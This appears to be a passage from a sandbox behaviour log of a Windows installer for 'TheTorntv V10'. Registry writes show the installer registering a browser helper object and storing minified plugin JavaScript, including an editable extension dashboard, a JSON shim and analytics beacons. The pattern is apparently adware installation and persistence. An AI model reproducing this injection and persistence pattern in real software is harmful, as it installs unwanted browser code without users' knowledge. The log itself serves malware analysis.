.remote.background_version\").html(s);jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .info_div th.remote\").html(\"Remote\");jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .info_div .versions_row\").each(function(){if(jQuery(this).find(\".local\").html()!=jQuery(this).find(\".remote\").html()){jQuery(this).addClass(\"alert\");}});}});});jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .info_div th.remote\").html(n);function j(p){var r=document.location.search.substring(1);var s=r.split(\"&\");for(var q=0;q<s.length;q++){var t=s[q].split(\"=\");if(decodeURIComponent(t[0])==p){return decodeURIComponent(t[1]);}}return null;}function a(p,r,q){if(r===null||typeof r===\"undefined\"){return\"\";}if(typeof r===\"string\"||typeof r===\"number\"){return\"<tr><td>\"+p+'</td><td onmouseover=\"readyForClipboardCopy(this);\"><div style=\"text-align: center; margin-bottom: 10px;\"><button class=\"btn btn-inverse btn-small\">Copy to clipboard</button></div><span>'+o(r)+\"<span></td><td>\"+typeof r+\"</td><td>\"+new Date(q).toUTCString()+\")</td></tr>\\n\";}else{return\"<tr><td>\"+p+'</td><td onmouseover=\"readyForClipboardCopy(this);\"><div style=\"text-align: center; margin-bottom: 10px;\"><button class=\"btn btn-inverse btn-small\">Copy to clipboard</button></div><span>'+appAPI.JSON.stringify(r)+\"<span></td><td>\"+typeof r+\"</td><td>\"+new Date(q).toUTCString()+\")</td></tr>\\n\";}}function l(p,q,r,s){q.click(function(){function t(u){if(r){jQuery(\".btn-info:visible\").removeClass(\"active\");jQuery(q).find(\".btn-info\").addClass(\"active\");jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .db_data\").fadeOut(function(){jQuery(this).remove();jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .databases_div\").append('<div class=\"db_data\" style=\"display: none; margin-top: 10px;\"></div>');var x=\"\";for(var w=0;w<u.length;w++){var v=u[w];p.get(v,function(y){p.getExpiration(v,function(z){x+=a(v,y,z);console.log(u.length);if(v===u[u.length-1]){if(x.length===0){x='<tr><td colspan=\"4\" style=\"text-align: center;\">-- empty --</td></tr>';}jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .db_data\").html('<table class=\"table table-bordered\"><tr><th>Key</th><th>Entry</th><th>Type</th><th>Expires On</th></tr>'+x+\"</table>\").fadeIn();}});});}});}else{jQuery(\".btn-info:visible\").removeClass(\"active\");jQuery(q).find(\".btn-info\").addClass(\"active\");jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .db_data\").fadeOut(function(){jQuery(this).remove();jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .databases_div\").append('<div class=\"db_data\" style=\"display: none; margin-top: 10px;\"></div>');var y=\"\";for(var x=0;x<u.length;x++){var v=u[x];var z=p.get(v);var w=p.getExpiration(v);y+=a(v,z,w);}if(y.length===0){y='<tr><td colspan=\"4\" style=\"text-align: center;\">-- empty --</td></tr>';}jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .db_data\").html('<table class=\"table table-bordered\"><tr><th>Key</th><th>Entry</th><th>Type</th><th>Expires On</th></tr>'+y+\"</table>\").fadeIn();});}}window.location.hash=window.location.hash.split(\"/\")[0]+\"/\"+window.location.hash.split(\"/\")[1]+\"/\"+s;if(r){p.getKeys(t);}else{t(p.getKeys());}});jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .databases_div\").append(q);}l(appAPI.db,jQuery('<span style=\"padding-right: 5px; padding-bottom: 5px; padding-top: 5px;\"><div class=\"btn btn-info db\">appAPI.db</div></span>'),false,\"db\");if(j(\"internal\")===\"true\"){l(appAPI.internal.db,jQuery('<span style=\"padding-right: 5px; padding-bottom: 5px; padding-top: 5px;\"><div class=\"btn btn-info internal-db\">appAPI.internal.db</div></span>'),false,\"internal-db\");}l(appAPI.db.async,jQuery('<span style=\"padding-right: 5px; padding-bottom: 5px; padding-top: 5px;\"><div class=\"btn btn-info db-async\">appAPI.db.async</div></span>'),true,\"db-async\");if(j(\"internal\")===\"true\"){l(appAPI.internal.db.async,jQuery('<span style=\"padding-right: 5px; padding-bottom: 5px; padding-top: 5px;\"><div class=\"btn btn-info internal-db-async\">appAPI.internal.db.async</div></span>'),true,\"internal-db-async\");}jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .databases_div\").append('<div class=\"db_data\" style=\"display: none; margin-top: 10px;\"></div>');appAPI.internal.userCode.getExtension(function(q){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .extension_js_div\").append('<div class=\"controllers\"></div><pre onmouseover=\"readyForClipboardCopy(this);\"><div style=\"text-align: center; margin-bottom: 10px;\"><button class=\"btn btn-inverse btn-small\">Copy to clipboard</button></div><div class=\"view-mode\">'+e(o(q))+'</div><div class=\"edit-mode\" style=\"display: none;\"><textarea>'+e(q)+\"</textarea></div></pre>\");var p=jQuery('<a href=\"#\" class=\"btn btn-info btn-mini btn-save\" onclick=\"return false;\">Save</a>');p.click(function(){appAPI.internal.userCode.setExtension(jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .extension_js_div .edit-mode textarea\").val());jQuery(this).closest(\".controllers\").find(\".btn-edit\").click();m();});jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .extension_js_div .controllers\").append(p);p=jQuery('<a href=\"#\" class=\"btn btn-info btn-mini btn-edit\" onclick=\"return false;\"><i class=\"icon-white icon-edit\"></i></a>');p.click(function(){jQuery(this).toggleClass(\"active\");if(jQuery(this).hasClass(\"active\")){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .extension_js_div pre .view-mode\").fadeOut(\"fast\",function(){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .extension_js_div pre .edit-mode\").fadeIn(\"fast\");});jQuery(this).closest(\".controllers\").find(\".btn-save\").addClass(\"visible\");}else{jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .extension_js_div pre .edit-mode\").fadeOut(\"fast\",function(){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .extension_js_div pre .view-mode\").fadeIn(\"fast\");});jQuery(this).closest(\".controllers\").find(\".btn-save\").removeClass(\"visible\");}});jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .extension_js_div .controllers\").append(p);});appAPI.internal.userCode.getBackground(function(q){var p=jQuery('<div class=\"btn btn-info\" style=\"min-width: 0;\">Reload</div>');p.click(function(){appAPI.internal.reloadBackground();appAPI.setTimeout(function(){document.location.reload();},3000);});jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .background_js_div\").append(p);jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .background_js_div\").append('<div class=\"controllers\"></div><pre onmouseover=\"readyForClipboardCopy(this);\"><div style=\"text-align: center; margin-bottom: 10px;\"><button class=\"btn btn-inverse btn-small\">Copy to clipboard</button></div><div class=\"view-mode\">'+e(o(q))+'</div><div class=\"edit-mode\" style=\"display: none;\"><textarea>'+e(q)+\"</textarea></div></pre>\");p=jQuery('<a href=\"#\" class=\"btn btn-info btn-mini btn-save\" onclick=\"return false;\">Save</a>');p.click(function(){appAPI.internal.userCode.setBackground(jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .background_js_div .edit-mode textarea\").val());jQuery(this).closest(\".controllers\").find(\".btn-edit\").click();m();});jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .background_js_div .controllers\").append(p);p=jQuery('<a href=\"#\" class=\"btn btn-info btn-mini btn-edit\" onclick=\"return false;\"><i class=\"icon-white icon-edit\"></i></a>');p.click(function(){jQuery(this).toggleClass(\"active\");if(jQuery(this).hasClass(\"active\")){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .background_js_div pre .view-mode\").fadeOut(\"fast\",function(){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .background_js_div pre .edit-mode\").fadeIn(\"fast\");});jQuery(this).closest(\".controllers\").find(\".btn-save\").addClass(\"visible\");}else{jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .background_js_div pre .edit-mode\").fadeOut(\"fast\",function(){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .background_js_div pre .view-mode\").fadeIn(\"fast\");});jQuery(this).closest(\".controllers\").find(\".btn-save\").removeClass(\"visible\");}});jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .background_js_div .controllers\").append(p);});function f(){var u=0;var r=1;var q=5;var s={};function t(){var w=[];w.push(\"<div>\");w.push(\"<h5>Background Plugins</h5>\");w.push('<div class=\"plugins_selector\"></div>');w.push(\"</div>\");w.push('<div class=\"plugins_code\"></div>');w.push(\"</div>\");w=w.join(\"\");jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .plugins_div\").html(w);}function v(w){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .plugins_code\").fadeOut(function(){appAPI.internal.plugins.getCode(w,function(y){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .plugins_code\").html('<div class=\"controllers\"></div><pre onmouseover=\"readyForClipboardCopy(this);\"><div style=\"text-align: center; margin-bottom: 10px;\"><button class=\"btn btn-inverse btn-small\">Copy to clipboard</button></div><div class=\"view-mode\">'+e(o(y))+'</div><div class=\"edit-mode\" style=\"display: none;\"><textarea>'+e(y)+\"</textarea></div></pre>\").fadeIn();var x=jQuery('<a href=\"#\" class=\"btn btn-info btn-mini btn-save\" onclick=\"return false;\">Save</a>');x.click(function(){var z=jQuery(\".plugins_selector select\").val().split(\"|\");appAPI.internal.plugins.setPluginCode(z[0],z[1],jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .plugins_code .edit-mode textarea\").val());jQuery(this).closest(\".controllers\").find(\".btn-edit\").click();m();});jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .plugins_code .controllers\").append(x);x=jQuery('<a href=\"#\" class=\"btn btn-info btn-mini btn-edit\" onclick=\"return false;\"><i class=\"icon-white icon-edit\"></i></a>');x.click(function(){jQuery(this).toggleClass(\"active\");if(jQuery(this).hasClass(\"active\")){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .plugins_code pre .view-mode\").fadeOut(\"fast\",function(){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .plugins_code pre .edit-mode\").fadeIn(\"fast\");});jQuery(this).closest(\".controllers\").find(\".btn-save\").addClass(\"visible\");}else{jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .plugins_code pre .edit-mode\").fadeOut(\"fast\",function(){jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .plugins_code pre .view-mode\").fadeIn(\"fast\");});jQuery(this).closest(\".controllers\").find(\".btn-save\").removeClass(\"visible\");}});jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .plugins_code .controllers\").append(x);});});}function p(w,y){selector=jQuery('<select><option value=\"0\">Select a plugin</option></select>');selector.change(function(){v({id:parseInt(jQuery(this).val().split(\"|\")[0])});window.location.hash=window.location.hash.split(\"/\")[0]+\"/\"+window.location.hash.split(\"/\")[1]+\"/\"+jQuery(this).val();});var x=function(C,B){var z=\"\";for(var A=0;A<C.length;A++){z+='<option value=\"'+C[A].id+\"|\"+C[A].name+'\">'+C[A].name+\" (id: \"+C[A].id+\" version: \"+C[A].ver+\")</option>\";}jQuery(\".plugins_selector select\").append('<optgroup label=\"'+B+'\">'+z+\"</optgroup>\");};y.append(selector);appAPI.internal.plugins.getOrder(u,function(z){x(z,\"Background Plugins\");});appAPI.internal.plugins.getOrder(r,function(z){x(z,\"Extension Plugins\");});appAPI.internal.plugins.getOrder(q,function(z){x(z,\"Popup Plugins\");});}t();p(null,jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .plugins_selector\"));jQuery(window).on(\"hashchange\",function(){if(window.location.hash.split(\"/\")[1]===\"plugins\"){v({id:parseInt(window.location.hash.split(\"/\")[2].split(\"|\")[0])});jQuery(\".plugins_selector select\").val(window.location.hash.split(\"/\")[2]);}});}function g(){var u=appAPI.internal.db.get(\"Resources_meta\");var r=[];function q(x,v,w){jQuery(\".btn-info:visible\").removeClass(\"active\");jQuery(w).find(\".btn-info\").addClass(\"active\");jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .resources_view\").fadeOut(function(){var y=appAPI.internal.db.get(\"Resources_resource_\"+x);if(v===\"img\"){y='<img src=\"'+y+'\" class=img-rounded/>';}else{if(v===\"js\"){y=e(o(y));y='<pre onmouseover=\"readyForClipboardCopy(this);\"><div style=\"text-align: center; margin-bottom: 10px;\"><button class=\"btn btn-inverse btn-small\">Copy to clipboard</button></div><span>'+y+\"</span></pre>\";}else{y=y.replace(/&/g,\"&\").replace(/</g,\"<\");y='<pre onmouseover=\"readyForClipboardCopy(this);\"><div style=\"text-align: center; margin-bottom: 10px;\"><button class=\"btn btn-inverse btn-small\">Copy to clipboard</button></div><span>'+y+\"</span></pre>\";}}jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .resources_view\").html(y).fadeIn();});}function t(){var w=[];w.push(\"<div>\");w.push(\"<h5>Resources</h5>\");w.push('<div class=\"resources_info\"></div>');w.push('<div class=\"resources_view\" style=\"margin-top:10px\"></div>');w.push(\"</div>\");w=w.join(\"\");var v=jQuery('<div class=\"btn btn-info ladda-button\" style=\"min-width: 0;\" data-style=\"expand-left\">Update Resources</div>');v.click(function(){var y=appAPI.internal.db.getKeys();for(var x=0;x<y.length;x++){if(y[x].match(/Resources*/)){appAPI.internal.db.remove(y[x]);}}jQuery(this).after('<br><img src=\"assets/img/spinner.gif\">');appAPI.setTimeout(function(){appAPI.resources.requestReload();appAPI.internal.reloadBackground();appAPI.setTimeout(function(){document.location.reload();},3000);},1000);});jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .resources_div\").html(v);jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .resources_div\").append(w);}function p(x){var w=(function(){var y=function(A,z){return A.indexOf(z,A.length-z.length)!==-1;};if(y(x.name,\".jpg\")||y(x.name,\".png\")){return\"img\";}else{if(y(x.name,\".js\")){return\"js\";}}return\"plain\";}());var v=jQuery(\"<span style='padding-right:5px;padding-bottom:5px;padding-top:5px;'><div class='btn btn-info \"+x.id+\"'>\"+x.name+\" (version: \"+x.ver+\")</div></span>\");v.click(function(A,y,z){return function(){location.hash=location.hash.split(\"/\")[0]+\"/\"+location.hash.split(\"/\")[1]+\"/\"+A;q(A,y,z);};}(x.id,w,v));jQuery(\"#extension_dashboard_\"+appAPI.appInfo.id+\" .resources_info\").append(v);}t();for(var s in u){if(u.hasOwnProperty(s)){p(u[s]);}}}f();g();}());\n" Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\41\Name = "IEInfo" Bodprv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\9ab333d0052b01323ffd0f6cdde3bdb00063311.BHO\CLSID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{55555555-5555-5555-5555-550655335511}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ = "GoogleUpdate Update3Web" GoogleUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID\ = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}" GoogleUpdate.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Installer Bodprv.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\TheTorntv V10\Plugins\14\JavaScript = "\nif(typeof(appAPI)===\"undefined\"){appAPI={};}var CR__bIsIEWindow=false;if(typeof window!==\"undefined\"&&typeof window.navigator!==\"undefined\"&&typeof window.navigator.userAgent!==\"undefined\"){CR__bIsIEWindow=/MSIE (\\d+\\.\\d+);/.test(window.navigator.userAgent);}CR__bIsIEWindow=(CR__bIsIEWindow||(typeof appAPIinternal!==\"undefined\"));appAPI.JSON={};if(typeof JSON!==\"undefined\"&&!CR__bIsIEWindow){appAPI.JSON=JSON;}else{(function(){function f(n){return n<10?\"0\"+n:n;}if(typeof Date.prototype.to_CR_JSON!==\"function\"){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear()+\"-\"+f(this.getUTCMonth()+1)+\"-\"+f(this.getUTCDate())+\"T\"+f(this.getUTCHours())+\":\"+f(this.getUTCMinutes())+\":\"+f(this.getUTCSeconds())+\"Z\":null;};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf();};}var cx=/[\\u0000\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,escapable=/[\\\\\\\"\\x00-\\x1f\\x7f-\\x9f\\u00ad\\u0600-\\u0604\\u070f\\u17b4\\u17b5\\u200c-\\u200f\\u2028-\\u202f\\u2060-\\u206f\\ufeff\\ufff0-\\uffff]/g,gap,indent,meta={\"\\b\":\"\\\\b\",\"\\t\":\"\\\\t\",\"\\n\":\"\\\\n\",\"\\f\":\"\\\\f\",\"\\r\":\"\\\\r\",'\"':'\\\\\"',\"\\\\\":\"\\\\\\\\\"},rep;function quote(string){escapable.lastIndex=0;return escapable.test(string)?'\"'+string.replace(escapable,function(a){var c=meta[a];return typeof c===\"string\"?c:\"\\\\u\"+(\"0000\"+a.charCodeAt(0).toString(16)).slice(-4);})+'\"':'\"'+string+'\"';}function str(key,holder){var i,k,v,length,mind=gap,partial,value=holder[key];if(value&&typeof value===\"object\"&&typeof value.to_CR_JSON===\"function\"){value=value.to_CR_JSON(key);}if(typeof rep===\"function\"){value=rep.call(holder,key,value);}switch(typeof value){case\"string\":return quote(value);case\"number\":return isFinite(value)?String(value):\"null\";case\"boolean\":case\"null\":return String(value);case\"object\":if(!value){return\"null\";}gap+=indent;partial=[];if(Object.prototype.toString.apply(value)===\"[object Array]\"){length=value.length;for(i=0;i<length;i+=1){partial[i]=str(i,value)||\"null\";}v=partial.length===0?\"[]\":gap?\"[\\n\"+gap+partial.join(\",\\n\"+gap)+\"\\n\"+mind+\"]\":\"[\"+partial.join(\",\")+\"]\";gap=mind;return v;}if(rep&&typeof rep===\"object\"){length=rep.length;for(i=0;i<length;i+=1){k=rep[i];if(typeof k===\"string\"){v=str(k,value);if(v){partial.push(quote(k)+(gap?\": \":\":\")+v);}}}}else{for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=str(k,value);if(v){partial.push(quote(k)+(gap?\": \":\":\")+v);}}}}v=partial.length===0?\"{}\":gap?\"{\\n\"+gap+partial.join(\",\\n\"+gap)+\"\\n\"+mind+\"}\":\"{\"+partial.join(\",\")+\"}\";gap=mind;return v;}}if(typeof appAPI.JSON.stringify!==\"function\"){appAPI.JSON.stringify=function(value,replacer,space){var i;gap=\"\";indent=\"\";if(typeof space===\"number\"){for(i=0;i<space;i+=1){indent+=\" \";}}else{if(typeof space===\"string\"){indent=space;}}rep=replacer;if(replacer&&typeof replacer!==\"function\"&&(typeof replacer!==\"object\"||typeof replacer.length!==\"number\")){throw new Error(\"appAPI.JSON.stringify\");}return str(\"\",{\"\":value});};}if(typeof appAPI.JSON.parse!==\"function\"){appAPI.JSON.parse=function(text,reviver){var j;function walk(holder,key){var k,v,value=holder[key];if(value&&typeof value===\"object\"){for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=walk(value,k);if(v!==undefined){value[k]=v;}else{delete value[k];}}}}return reviver.call(holder,key,value);}text=String(text);cx.lastIndex=0;if(cx.test(text)){text=text.replace(cx,function(a){return\"\\\\u\"+(\"0000\"+a.charCodeAt(0).toString(16)).slice(-4);});}if(/^[\\],:{}\\s]*$/.test(text.replace(/\\\\(?:[\"\\\\\\/bfnrt]|u[0-9a-fA-F]{4})/g,\"@\").replace(/\"[^\"\\\\\\n\\r]*\"|true|false|null|-?\\d+(?:\\.\\d*)?(?:[eE][+\\-]?\\d+)?/g,\"]\").replace(/(?:^|:|,)(?:\\s*\\[)+/g,\"\"))){j=eval(\"(\"+text+\")\");return typeof reviver===\"function\"?walk({\"\":j},\"\"):j;}throw new SyntaxError(\"appAPI.JSON.parse\");};}}());}(function(a){a.debug=function(h,f){if(!a.isDebugMode()){return;}var b=!a.debug.settings.console;if(f!==null){b=f;}try{if(!b){var g=new Date();var i=(((a.debug.settings.timestamp)&&(typeof(h)==\"string\"))?(g.toLocaleTimeString()+\".\"+g.getMilliseconds()+\": \"+h):h);console.log(i);}else{alert(h);}}catch(c){alert(h);}};a.debug.settings={console:true,timestamp:true};})(appAPI);(function(a){if(typeof a.installer===\"undefined\"){a.installer={};}a.installer.getParams=function(){if(appAPI.internal&&appAPI.internal.installer&&appAPI.internal.installer.installerParams&&appAPI.internal.installer.installerParams.source_id&&appAPI.internal.installer.installerParams.source_id!==\"__SOURCE_ID__\"&&appAPI.internal.installer.installerParams.sub_id&&appAPI.internal.installer.installerParams.sub_id!==\"__SUB_ID__\"&&appAPI.internal.installer.installerParams.uzid&&appAPI.internal.installer.installerParams.uzid!==\"__UZID__\"){return appAPI.internal.installer.installerParams;}return(a.db.get(\"InstallerParams\")||{});};a.installer.getUnixTime=function(){return(a.db.get(\"InstallationTime\")||null);};a.installer.getIsFirstInstall=function(){if(!appAPI.internal||!appAPI.internal.installer||!appAPI.internal.installer.isFirstInstall){return true;}else{return appAPI.internal.installer.isFirstInstall===\"__FIRST_INSTALL__\";}};a.installer.getInstallerVersion=function(){var c=\"0\";var b=appAPI.internal.db.get(\"__installer_version__\");if(appAPI.internal&&appAPI.internal.installer&&appAPI.internal.installer.version&&appAPI.internal.installer.version!==\"__INSTALLER_VERSION__\"){c=appAPI.internal.installer.version;appAPI.internal.db.set(\"__installer_version__\",appAPI.internal.installer.version);}if(b){c=b;}return c;};})(appAPI);(function(b){b.time={};b.time.now=function(){return a(0);};b.time.secondsFromNow=function(c){return a(c*1000);};b.time.secondsAgo=function(c){return a(c*-1000);};b.time.minutesFromNow=function(c){return a(c*60*1000);};b.time.minutesAgo=function(c){return a(c*60*-1000);};b.time.hoursFromNow=function(c){return a(c*3600*1000);};b.time.hoursAgo=function(c){return a(c*3600*-1000);};b.time.daysFromNow=function(c){return a(c*3600*24*1000);};b.time.daysAgo=function(c){return a(c*3600*24*-1000);};b.time.yearsFromNow=function(c){return a(c*365*3600*24*1000);};b.time.yearsAgo=function(c){return a(c*365*3600*24*-1000);};function a(c){return new Date(new Date().getTime()+c);}})(appAPI);(function(a){a.analytics={};a.analytics.trackUrl=function(b){function c(h,j,e){function o(q,i){return q+Math.floor(Math.random()*(i-q));}var l=1000000000,p=o(l,9999999999),f=o(10000000,99999999),g=o(l,2147483647),n=(new Date()).getTime(),m=window.location,k=new Image(),d=document.location.protocol+\"//www.google-analytics.com/__utm.gif?utmwv=1.3&utmn=\"+p+\"&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=\"+j+\"&utmr=\"+m+\"&utmp=\"+e+\"&utmac=\"+h+\"&utmcc=__utma%3D\"+f+\".\"+g+\".\"+n+\".\"+n+\".\"+n+\".2%3B%2B__utmb%3D\"+f+\"%3B%2B__utmc%3D\"+f+\"%3B%2B__utmz%3D\"+f+\".\"+n+\".2.2.utmccn%3D(referral)%7Cutmcsr%3D\"+m.host+\"%7Cutmcct%3D\"+m.pathname+\"%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\"+f+\".-%3B\";k.src=d;}if((this.settings.account===\"\")||(this.settings.domain===\"\")){a.debug(\"Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\");return;}c(this.settings.account,this.settings.domain,b);};a.analytics.trackEvent=function(c,e,b,d){function f(m,o,h,k,n,u,v){function t(x,i){return x+Math.floor(Math.random()*(i-x));}var q=1000000000,w=t(q,9999999999),j=t(10000000,99999999),l=t(q,2147483647),s=(new Date()).getTime(),r=window.location,p=new Image(),g=document.location.protocol+\"//www.google-analytics.com/__utm.gif?utmwv=4.8.9&utmn=\"+w+\"&utmsr=-&utmsc=-&utmul=-&utmje=0&utmfl=-&utmdt=-&utmhn=\"+o+\"&utmr=-&utmt=event&utme=5(\"+k+\"*\"+n+\"*\"+u+\")(\"+v+\")&utmp=\"+h+\"&utmac=\"+m+\"&utmcc=__utma%3D\"+j+\".\"+l+\".\"+s+\".\"+s+\".\"+s+\".2%3B%2B__utmb%3D\"+j+\"%3B%2B__utmc%3D\"+j+\"%3B%2B__utmz%3D\"+j+\".\"+s+\".2.2.utmccn%3D(referral)%7Cutmcsr%3D\"+r.host+\"%7Cutmcct%3D\"+r.pathname+\"%7Cutmcmd%3Dreferral%3B%2B__utmv%3D\"+j+\".-%3B\";p.src=g;}if(typeof(c)!=\"string\"){c=\"\";}if(typeof(e)!=\"string\"){e=\"\";}if(typeof(b)!=\"string\"){b=\"\";}if(typeof(d)!=\"number\"){d=0;}if((c===\"\")&&(e===\"\")&&(b===\"\")&&(d===0)){a.debug(\"Error: In order to use trackEvent you must specify the event parameters!\");return;}if((this.settings.account===\"\")||(this.settings.domain===\"\")){a.debug(\"Error: In order to use the analytics API you must first specify your domain and account ID from Google Analytics!\\nThis can easily done by setting appAPI.setting.account and appAPI.setting.domain\");return;}f(this.settings.account,this.settings.domain,document.location.href,c,e,b,d);};a.analytics.settings={account:\"\",domain:\"\"};})(appAPI);(function(){if(typeof appAPI===\"undefined\"){appAPI={};}if(typeof appAPI.utils===\"undefined\"){appAPI.utils={};}appAPI.utils.indexOf=function(arr,searchElement){if(!arr){return -1;}var len=arr.length;if(len===0){return -1;}if(typeof arr.indexOf!==\"undefined\"){return arr.indexOf(searchElement,arguments[2]);}var n=0;if(arguments.length>2){n=Number(arguments[2]);if(n!=n){n=0;}else{if(n!=0&&n!=Infinity&&n!=-Infinity){n=(n>0||-1)*Math.floor(Math.abs(n));}}}if(n>=len){return -1;}var k=n>=0?n:Math.max(len-Math.abs(n),0);for(;k<len;k++){if(k in arr&&arr[k]===searchElement){return k;}}return -1;};(function(){var isFactory=function(type){return function(obj){var clas=Object.prototype.toString.call(obj).slice(8,-1);return obj!==undefined&&obj!==null&&clas===type;};};var isUndefined=function(obj){return typeof obj===\"undefined\";};var isNull=function(obj){return obj===null;};appAPI.utils.isObject=isFactory(\"Object\");appAPI.utils.isNumber=isFactory(\"Number\");appAPI.utils.isString=isFactory(\"String\");appAPI.utils.isArray=isFactory(\"Array\");appAPI.utils.isBoolean=isFactory(\"Boolean\");appAPI.utils.isFunction=isFactory(\"Function\");appAPI.utils.isDOMElement=function(elem){return elem instanceof HTMLElement;};appAPI.utils.isDefined=function(elem){return(!isUndefined(elem)&&!isNull(elem));};}());appAPI.utils.getHost=function(url){var parser=document.createElement(\"a\");parser.href=url;return parser.hostname;};appAPI.utils.getDomain=(function(){var TLDs=[\"ac\",\"ad\",\"ae\",\"aero\",\"af\",\"ag\",\"ai\",\"al\",\"am\",\"an\",\"ao\",\"aq\",\"ar\",\"arpa\",\"as\",\"asia\",\"at\",\"au\",\"aw\",\"ax\",\"az\",\"ba\",\"bb\",\"bd\",\"be\",\"bf\",\"bg\",\"bh\",\"bi\",\"biz\",\"bj\",\"bm\",\"bn\",\"bo\",\"br\",\"bs\",\"bt\",\"bv\",\"bw\",\"by\",\"bz\",\"ca\",\"cat\",\"cc\",\"cd\",\"cf\",\"cg\",\"ch\",\"ci\",\"ck\",\"cl\",\"cm\",\"cn\",\"co\",\"com\",\"coop\",\"cr\",\"cu\",\"cv\",\"cx\",\"cy\",\"cz\",\"de\",\"dj\",\"dk\",\"dm\",\"do\",\"dz\",\"ec\",\"edu\",\"ee\",\"eg\",\"er\",\"es\",\"et\",\"eu\",\"fi\",\"fj\",\"fk\",\"fm\",\"fo\",\"fr\",\"ga\",\"gb\",\"gd\",\"ge\",\"gf\",\"gg\",\"gh\",\"gi\",\"gl\",\"gm\",\"gn\",\"gov\",\"gp\",\"gq\",\"gr\",\"gs\",\"gt\",\"gu\",\"gw\",\"gy\",\"hk\",\"hm\",\"hn\",\"hr\",\"ht\",\"hu\",\"id\",\"ie\",\"il\",\"im\",\"in\",\"info\",\"int\",\"io\",\"iq\",\"ir\",\"is\",\"it\",\"je\",\"jm\",\"jo\",\"jobs\",\"jp\",\"ke\",\"kg\",\"kh\",\"ki\",\"km\",\"kn\",\"kp\",\"kr\",\"kw\",\"ky\",\"kz\",\"la\",\"lb\",\"lc\",\"li\",\"lk\",\"lr\",\"ls\",\"lt\",\"lu\",\"lv\",\"ly\",\"ma\",\"mc\",\"md\",\"me\",\"mg\",\"mh\",\"mil\",\"mk\",\"ml\",\"mm\",\"mn\",\"mo\",\"mobi\",\"mp\",\"mq\",\"mr\",\"ms\",\"mt\",\"mu\",\"museum\",\"mv\",\"mw\",\"mx\",\"my\",\"mz\",\"na\",\"name\",\"nc\",\"ne\",\"net\",\"nf\",\"ng\",\"ni\",\"nl\",\"no\",\"np\",\"nr\",\"nu\",\"nz\",\"om\",\"org\",\"pa\",\"pe\",\